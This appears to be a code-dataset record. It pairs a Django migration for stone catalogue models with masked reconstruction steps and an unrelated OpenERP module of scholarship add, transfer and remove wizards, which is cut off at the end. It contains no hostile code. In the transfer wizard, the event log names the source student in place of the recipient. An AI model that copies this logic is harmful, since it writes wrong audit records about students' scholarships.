class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Kategori', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nama_kategori', models.CharField(
max_length=30)), ('deskripsi', models.CharField(max_length=100))]),
migrations.CreateModel(name='Stone', fields=[('id', models.
AutoField(auto_created=True, primary_key=True, serialize=False,
verbose_name='ID')), ('kode', models.CharField(max_length=30)), (
'deskripsi', models.CharField(max_length=200)), ('cover_stone',
models.ImageField(upload_to='\\images')), ('kategori', models.
ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
'stones.Kategori'))])]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-08-03 02:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Kategori',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nama_kategori', models.CharField(max_length=30)),
('deskripsi', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Stone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('kode', models.CharField(max_length=30)),
('deskripsi', models.CharField(max_length=200)),
('cover_stone', models.ImageField(upload_to='\\images')),
('kategori', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stones.Kategori')),
],
),
]
|
flexible
|
{
"blob_id": "cdd929ee041c485d2a6c1149ea1b1ced92d7b7ab",
"index": 5972,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Kategori', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nama_kategori', models.CharField(\n max_length=30)), ('deskripsi', models.CharField(max_length=100))]),\n migrations.CreateModel(name='Stone', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('kode', models.CharField(max_length=30)), (\n 'deskripsi', models.CharField(max_length=200)), ('cover_stone',\n models.ImageField(upload_to='\\\\images')), ('kategori', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'stones.Kategori'))])]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Kategori', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nama_kategori', models.CharField(\n max_length=30)), ('deskripsi', models.CharField(max_length=100))]),\n migrations.CreateModel(name='Stone', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('kode', models.CharField(max_length=30)), (\n 'deskripsi', models.CharField(max_length=200)), ('cover_stone',\n models.ImageField(upload_to='\\\\images')), ('kategori', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'stones.Kategori'))])]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.2 on 2016-08-03 02:31\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Kategori',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nama_kategori', models.CharField(max_length=30)),\n ('deskripsi', models.CharField(max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Stone',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('kode', models.CharField(max_length=30)),\n ('deskripsi', models.CharField(max_length=200)),\n ('cover_stone', models.ImageField(upload_to='\\\\images')),\n ('kategori', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stones.Kategori')),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# coding: utf-8
from openerp import SUPERUSER_ID
from openerp.osv import osv, fields
from openerp.addons.ud.ud import _TIPOS_BOLSA
TIPOS_BOLSA = dict(_TIPOS_BOLSA)
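# Finds an existing ud.dados.bancarios record that matches the bank fields
# filled on the wizard (only the fields the chosen bank requires are compared);
# the record is reused when it is unowned or already owned by ``usuario_id``,
# a duplicate owned by someone else raises, otherwise a new record is created.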
def get_banco(cls, cr, browse_record, usuario_id, context=None):
dados_bancarios_model = cls.pool.get("ud.dados.bancarios")
args = [("banco_id", "=", browse_record.banco_id.id)]
if browse_record.agencia_v:
args.append(("agencia", "=", browse_record.agencia))
if browse_record.dv_agencia_v:
args.append(("dv_agencia", "=", browse_record.dv_agencia))
if browse_record.conta_v:
args.append(("conta", "=", browse_record.conta))
if browse_record.dv_conta_v:
args.append(("dv_conta", "=", browse_record.dv_conta))
if browse_record.operacao_v:
args.append(("operacao", "=", browse_record.operacao))
dados_bancarios = dados_bancarios_model.search(cr, SUPERUSER_ID, args, context=context)
if dados_bancarios:
dados_bancarios = dados_bancarios_model.browse(cr, SUPERUSER_ID, dados_bancarios[0])
if not dados_bancarios.ud_conta_id:
return dados_bancarios.id
elif dados_bancarios.ud_conta_id.id == usuario_id:
return dados_bancarios.id
raise osv.except_osv(u"Dados Bancários duplicados", u"Outra pessoa já possui esses dados bancários!")
dados = {"banco_id": browse_record.banco_id.id, "agencia": browse_record.agencia, "dv_agencia": browse_record.dv_agencia,
"conta": browse_record.conta, "dv_conta": browse_record.dv_conta, "operacao": browse_record.operacao,
"ud_conta_id": usuario_id}
return dados_bancarios_model.create(cr, SUPERUSER_ID, dados, context=context)
class AdicionarBolsaWizard(osv.TransientModel):
_name = "ud.monitoria.bolsa.adicionar.wizard"
_description = u"Inclusão de bolsa de monitoria para discente (UD)"
_STATES = [
("n_bolsista", u"Não Bolsista"),
("reserva", u"Cadastro de Reserva"),
]
def _bolsas(self, cr, uid, ids, campos, args, context=None):
oferta_model = self.pool.get("ud.monitoria.oferta.disciplina")
res = {}
for add in self.browse(cr, uid, ids, context):
res[add.id] = add.disciplina_id.bolsas
return res
_columns = {
"semestre_id": fields.many2one("ud.monitoria.registro", u"Semestre", required=True, readonly=True),
"curso_id": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), "
"('is_active', '=', True)]"),
"bolsas": fields.function(_bolsas, type="integer", string=u"Bolsas disponíveis",
help=u"Número de bolsas disponíveis para a disciplina"),
"valor_bolsa": fields.float(u"Bolsa (R$)"),
"tutor": fields.boolean(u"Tutor?"),
"status": fields.selection(_STATES, u"Status", required=True),
"doc_discente_id": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), "
"('is_active', '=', True), ('state', '=', status)]"),
        # BANK DETAILS
"dados_bancarios_id": fields.many2one("ud.dados.bancarios", u"Dados Bancários", domain=[('id', '=', False)]),
"banco_id": fields.many2one("ud.banco", u"Banco", ondelete="restrict"),
"agencia": fields.char(u"Agência", size=4, help=u"Número da Agência"),
"dv_agencia": fields.char(u"DV Agência", size=2, help=u"Dígito verificador da Agência"),
"conta": fields.char(u"Conta", size=10, help=u"Número da Conta"),
"dv_conta": fields.char(u"DV Conta", size=1, help=u"Dígito verificador da Conta"),
"operacao": fields.char(u"Operação", size=3, help=u"Tipo de conta"),
"agencia_v": fields.related("banco_id", "agencia", type="boolean", invisible=True, readonly=True),
"dv_agencia_v": fields.related("banco_id", "dv_agencia", type="boolean", invisible=True, readonly=True),
"conta_v": fields.related("banco_id", "conta", type="boolean", invisible=True, readonly=True),
"dv_conta_v": fields.related("banco_id", "dv_conta", type="boolean", invisible=True, readonly=True),
"operacao_v": fields.related("banco_id", "operacao", type="boolean", invisible=True, readonly=True),
}
def default_get(self, cr, uid, fields_list, context=None):
res = super(AdicionarBolsaWizard, self).default_get(cr, uid, fields_list, context)
res["status"] = "n_bolsista"
res["valor_bolsa"] = 400.
context = context or {}
if context.get("active_id", False):
if context.get("active_model", False) == "ud.monitoria.registro":
res["semestre_id"] = context.get("active_id")
elif context.get("active_model", False) == "ud.monitoria.documentos.discente":
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, context.get("active_id"), context)
if doc.state == "bolsista":
raise osv.except_osv(u"Discente bolsista", u"O discente já é bolsista")
elif not doc.is_active:
raise osv.except_osv(u"Documento do discente inativo", u"Não é possível alterar o status de discentes inativos")
res["semestre_id"] = doc.disciplina_id.semestre_id.id
res["curso_id"] = doc.disciplina_id.curso_id.id
res["disciplina_id"] = doc.disciplina_id.id
res["tutor"] = doc.tutor
res["status"] = doc.state
res["doc_discente_id"] = doc.id
return res
def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):
if not (semestre_id and curso_id):
return {"value": {"disciplina_id": False}}
reg = self.pool.get("ud.monitoria.registro").read(cr, uid, semestre_id, ["processos_seletivos_ids"], context=context, load="_classic_write")
args = [("curso_id", "=", curso_id), ("processo_seletivo_id", "=", reg["processos_seletivos_ids"]), ("is_active", "=", True)]
disc = self.pool.get("ud.monitoria.disciplina").search(cr, uid, args, context=context)
res = {"domain": {"disciplina_id": [("id", "in", disc)]}}
if not disc:
res["value"]= {"disciplina_id": False}
return res
def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):
if disciplina_id:
if doc_discente_id:
doc_discente = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False
disciplina_id = self.pool.get("ud.monitoria.disciplina").browse(cr, uid, disciplina_id, context)
return {
"value": {"doc_discente_id": doc_discente_id,
"bolsas": disciplina_id.bolsas}
}
return {"value": {"doc_discente_id": False, "bolsas": 0}}
def onchange_doc_discente(self, cr, uid, ids, doc_discente_id, dados_bancarios_id, context=None):
if doc_discente_id:
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
if not dados_bancarios_id:
dados_bancarios_id = getattr(doc.dados_bancarios_id, "id", False)
return {"value": {"dados_bancarios_id": dados_bancarios_id},
"domain": {"dados_bancarios_id": [("ud_conta_id", "=", doc.discente_id.id)]}}
return {"value": {"dados_bancarios_id": False},
"domain": {"dados_bancarios_id": [("id", "=", False)]}}
def onchange_banco(self, cr, uid, ids, banco_id, context=None):
if banco_id:
banco = self.pool.get("ud.banco").read(cr, uid, banco_id, [
"agencia", "dv_agencia", "conta", "dv_conta", "operacao"
], context=context, load="_classic_write")
vals = {"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}
vals.update({"%s_v" % dado: banco.get(dado) for dado in banco.keys()})
return {"value": vals}
return {"value": {"agencia_v": False, "dv_agencia_v": False, "conta_v": False, "dv_conta_v": False,"operacao_v": False,
"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}}
def botao_adicionar(self, cr, uid, ids, context=None):
perfil_model = self.pool.get("ud.perfil")
for add in self.browse(cr, uid, ids, context):
if add.bolsas == 0:
raise osv.except_osv(u"Bolsas Insuficientes", u"Não há bolsas disponíveis para essa disciplina")
elif not add.doc_discente_id.is_active:
raise osv.except_osv(u"Documento do discente inativo",
u"O discente não pode ser classificado como bolsista")
if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:
raise osv.except_osv(
u"Discente bolsista",
u"O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"".format(
add.doc_discente_id.discente_id.name, add.doc_discente_id.inscricao_id.perfil_id.matricula,
TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.tipo_bolsa]
)
)
responsavel = self.pool.get("ud.employee").search(cr, SUPERUSER_ID, [("user_id", "=", uid)], limit=2)
if not responsavel:
raise osv.except_osv(
u"Registro Inexistente",
u"Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo"
)
if len(responsavel) > 1:
raise osv.except_osv(
u"Multiplos vínculos",
u"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo"
)
perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.inscricao_id.perfil_id.id, {
"is_bolsista": True, "tipo_bolsa": "m", "valor_bolsa": ("%.2f" % add.valor_bolsa).replace(".", ",")
})
if not add.dados_bancarios_id:
dados_bancarios = get_banco(self, cr, add, add.doc_discente_id.discente_id.id, context)
else:
dados_bancarios = add.dados_bancarios_id.id
add.doc_discente_id.write({"state": "bolsista", "dados_bancarios_id": dados_bancarios})
evento = {
"responsavel_id": responsavel[0],
"name": u"Adição de bolsa: \"%s\"" % add.doc_discente_id.discente_id.name,
"envolvidos_ids": [(4, add.doc_discente_id.discente_id.id)],
"descricao": u"Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\"." % (
("%.2f" % add.valor_bolsa).replace(".", ","),
add.doc_discente_id.discente_id.name.upper(), add.doc_discente_id.inscricao_id.perfil_id.matricula
)
}
add.semestre_id.write({"eventos_ids": [(0, 0, evento)]})
return True
class TransferirBolsaWizard(osv.TransientModel):
_name = "ud.monitoria.bolsa.transferir.wizard"
_description = u"Transferência de bolsa de monitoria (UD)"
_STATES = [
("n_bolsista", u"Não Bolsista"),
("reserva", u"Cadastro de Reserva"),
]
_columns = {
"semestre_id": fields.many2one("ud.monitoria.registro", u"Semestre", required=True, readonly=True),
"curso_id_de": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id_de": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('id', '=', False)]"),
"tutor_de": fields.boolean(u"Tutor?"),
"doc_discente_id_de": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('is_active', '=', True), ('state', '=', 'bolsista'), "
"('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]"),
"curso_id_para": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id_para": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), "
"('is_active', '=', True)]"),
"tutor_para": fields.boolean(u"Tutor?"),
"status_para": fields.selection(_STATES, u"Status", required=True),
"doc_discente_id_para": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('is_active', '=', True), ('state', '=', status_para), "
"('disciplina_id', '=', disciplina_id_para), "
"('tutor', '=', tutor_para)]"),
        # BANK DETAILS
"banco_id": fields.many2one("ud.banco", u"Banco", ondelete="restrict"),
"agencia": fields.char(u"Agência", size=4, help=u"Número da Agência"),
"dv_agencia": fields.char(u"DV Agência", size=2, help=u"Dígito verificador da Agência"),
"conta": fields.char(u"Conta", size=10, help=u"Número da Conta"),
"dv_conta": fields.char(u"DV Conta", size=1, help=u"Dígito verificador da Conta"),
"operacao": fields.char(u"Operação", size=3, help=u"Tipo de conta"),
"agencia_v": fields.related("banco_id", "agencia", type="boolean", invisible=True, readonly=True),
"dv_agencia_v": fields.related("banco_id", "dv_agencia", type="boolean", invisible=True, readonly=True),
"conta_v": fields.related("banco_id", "conta", type="boolean", invisible=True, readonly=True),
"dv_conta_v": fields.related("banco_id", "dv_conta", type="boolean", invisible=True, readonly=True),
"operacao_v": fields.related("banco_id", "operacao", type="boolean", invisible=True, readonly=True),
}
def default_get(self, cr, uid, fields_list, context=None):
res = super(TransferirBolsaWizard, self).default_get(cr, uid, fields_list, context)
context = context or {}
if context.get("active_id", False):
if context.get("active_model", False) == "ud.monitoria.registro":
res["semestre_id"] = context.get("active_id")
elif context.get("active_model", False) == "ud.monitoria.documentos.discente":
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, context.get("active_id"),
context)
if doc.state != "bolsista":
raise osv.except_osv(u"Discente bolsista", u"O discente já é bolsista")
elif not doc.is_active:
raise osv.except_osv(u"Documento do discente inativo",
u"O discente não pode ser classificado como bolsista")
res["semestre_id"] = doc.disciplina_id.semestre_id.id
res["curso_id_de"] = doc.disciplina_id.curso_id.id
res["disciplina_id_de"] = doc.disciplina_id.id
res["tutor_de"] = doc.tutor
res["status_de"] = doc.state
res["doc_discente_id_de"] = doc.id
return res
def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id, disciplina_id, context=None):
if not (semestre_id and curso_id):
return {"value": {"disciplina_id_" + comp: False}}
reg = self.pool.get("ud.monitoria.registro").read(cr, uid, semestre_id, ["processos_seletivos_ids"], context=context, load="_classic_write")
args = [("curso_id", "=", curso_id), ("processo_seletivo_id", "=", reg["processos_seletivos_ids"]), ("is_active", "=", True)]
disc = self.pool.get("ud.monitoria.disciplina").search(cr, uid, args, context=context)
res = {"domain": {"disciplina_id_" + comp: [("id", "in", disc)]}}
if not disc:
res["value"] = {"disciplina_id_" + comp: False}
return res
def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id, doc_discente_id, context=None):
if disciplina_id and doc_discente_id:
doc_discente = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False
return {
"value": {"doc_discente_id_" + comp: doc_discente_id}
}
return {"value": {"doc_discente_id_" + comp: False}}
def onchange_banco(self, cr, uid, ids, banco_id, context=None):
if banco_id:
banco = self.pool.get("ud.banco").read(cr, uid, banco_id, [
"agencia", "dv_agencia", "conta", "dv_conta", "operacao"
], context=context, load="_classic_write")
vals = {"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}
vals.update({"%s_v" % dado: banco.get(dado) for dado in banco.keys()})
return {"value": vals}
return {"value": {"agencia_v": False, "dv_agencia_v": False, "conta_v": False, "dv_conta_v": False,"operacao_v": False,
"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}}
def botao_transferir(self, cr, uid, ids, context=None):
perfil_model = self.pool.get("ud.perfil")
for transf in self.browse(cr, uid, ids, context):
matricula = transf.doc_discente_id_para.discente_id.matricula
for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:
if perfil.matricula == matricula and perfil.tipo == "a":
if perfil.is_bolsista:
raise osv.except_osv(
u"Discente bolsista",
u"O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"".format(
transf.doc_discente_id_para.discente_id.pessoa_id.name, matricula,
TIPOS_BOLSA[perfil.tipo_bolsa]
)
)
break
            else:
                # for/else: this branch runs only when no matching perfil was found
                raise osv.except_osv(
                    u"Perfil excluído",
                    u"O perfil do discente para a matrícula \"%s\" não existe ou foi excluído" % matricula
                )
matricula = transf.doc_discente_id_de.discente_id.matricula
for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:
                if perfil_de.matricula == matricula and perfil_de.tipo == "a":
break
responsavel = self.pool.get("ud.employee").search(cr, SUPERUSER_ID, [("user_id", "=", uid)], limit=2)
if not responsavel:
raise osv.except_osv(
u"Registro Inexistente",
u"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo"
)
if len(responsavel) > 1:
raise osv.except_osv(
u"Multiplos vínculos",
u"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo"
)
valor = perfil_de.valor_bolsa
perfil_model.write(cr, SUPERUSER_ID, perfil.id, {
"is_bolsista": True, "tipo_bolsa": "m", "valor_bolsa": valor
})
perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {
"is_bolsista": False, "tipo_bolsa": False, "valor_bolsa": False
})
transf.doc_discente_id_de.write({"state": "n_bolsista"})
transf.doc_discente_id_para.write({"state": "bolsista", "is_active": True})
get_banco(self, cr, transf, transf.doc_discente_id_para.discente_id.pessoa_id.id, context)
evento = {
"responsavel_id": responsavel[0],
"name": u"Transferência de bolsa",
"envolvidos_ids": [(4, transf.doc_discente_id_de.discente_id.pessoa_id.id),
(4, transf.doc_discente_id_para.discente_id.pessoa_id.id)],
"descricao": u"Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula "
u"%(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula"
u"\"%(matricula_para)s\"." % {
"valor": valor, "discente_de": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),
"matricula_de": perfil_de.matricula,
"discente_para": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),
"matricula_para": perfil_de.matricula
}
}
transf.semestre_id.write({"eventos_ids": [(0, 0, evento)]})
return True
class RemoverBolsaWizard(osv.TransientModel):
_name = "ud.monitoria.bolsa.remover.wizard"
_description = u"Remoção de bolsa de discente"
_columns = {
"semestre_id": fields.many2one("ud.monitoria.registro", u"Semestre", required=True, readonly=True),
"curso_id": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('id', '=', False)]"),
"tutor": fields.boolean(u"Tutor?"),
"doc_discente_id": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), "
"('is_active', '=', True), ('state', '=', 'bolsista')]"),
}
def default_get(self, cr, uid, fields_list, context=None):
res = super(RemoverBolsaWizard, self).default_get(cr, uid, fields_list, context)
context = context or {}
if context.get("active_id", False):
if context.get("active_model", False) == "ud.monitoria.registro":
res["semestre_id"] = context.get("active_id")
elif context.get("active_model", False) == "ud.monitoria.documentos.discente":
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, context.get("active_id"), context)
if doc.state != "bolsista":
raise osv.except_osv(u"Discente não bolsista", u"O discente não é bolsista")
elif not doc.is_active:
raise osv.except_osv(u"Documento do discente inativo",
u"Não é possível alterar o status de discentes inativos")
res["semestre_id"] = doc.disciplina_id.semestre_id.id
res["curso_id"] = doc.disciplina_id.curso_id.id
res["disciplina_id"] = doc.disciplina_id.id
res["tutor"] = doc.tutor
res["doc_discente_id"] = doc.id
return res
def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):
if not (semestre_id and curso_id):
return {"value": {"disciplina_id": False}}
reg = self.pool.get("ud.monitoria.registro").read(cr, uid, semestre_id, ["processos_seletivos_ids"], context=context, load="_classic_write")
args = [("curso_id", "=", curso_id), ("processo_seletivo_id", "=", reg["processos_seletivos_ids"]), ("is_active", "=", True)]
disc = self.pool.get("ud.monitoria.disciplina").search(cr, uid, args, context=context)
res = {"domain": {"disciplina_id": [("id", "in", disc)]}}
if not disc:
res["value"] = {"disciplina_id": False}
return res
def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):
if disciplina_id and doc_discente_id:
doc_discente = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False
return {
"value": {"doc_discente_id": doc_discente_id}
}
return {"value": {"doc_discente_id": False}}
def botao_remover(self, cr, uid, ids, context=None):
perfil_model = self.pool.get("ud.perfil")
pessoa_model = self.pool.get("ud.employee")
for rem in self.browse(cr, uid, ids, context):
responsavel = pessoa_model.search(cr, SUPERUSER_ID, [("user_id", "=", uid)], limit=2)
if not responsavel:
raise osv.except_osv(
u"Registro Inexistente",
u"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo"
)
if len(responsavel) > 1:
raise osv.except_osv(
u"Multiplos vínculos",
u"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo"
)
perfil = rem.doc_discente_id.inscricao_id.perfil_id
perfil_model.write(cr, SUPERUSER_ID, perfil.id, {
"is_bolsista": False, "tipo_bolsa": False, "valor_bolsa": False
})
rem.doc_discente_id.write({"state": "n_bolsista"})
evento = {
"responsavel_id": responsavel[0],
"name": u"Remoção de bolsa: \"%s\"" % rem.doc_discente_id.discente_id.name,
"envolvidos_ids": [(4, rem.doc_discente_id.discente_id.id)],
"descricao": u"A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida." % (
rem.doc_discente_id.discente_id.name.upper(), perfil.matricula
)
}
rem.semestre_id.write({"eventos_ids": [(0, 0, evento)]})
return True
|
normal
|
{
"blob_id": "fd877f5952c1fc0b2115d0950a066501ee7545f8",
"index": 4150,
"step-1": "<mask token>\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n <mask token>\n <mask token>\n <mask token>\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n <mask token>\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n <mask token>\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n <mask token>\n <mask token>\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n 
).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), 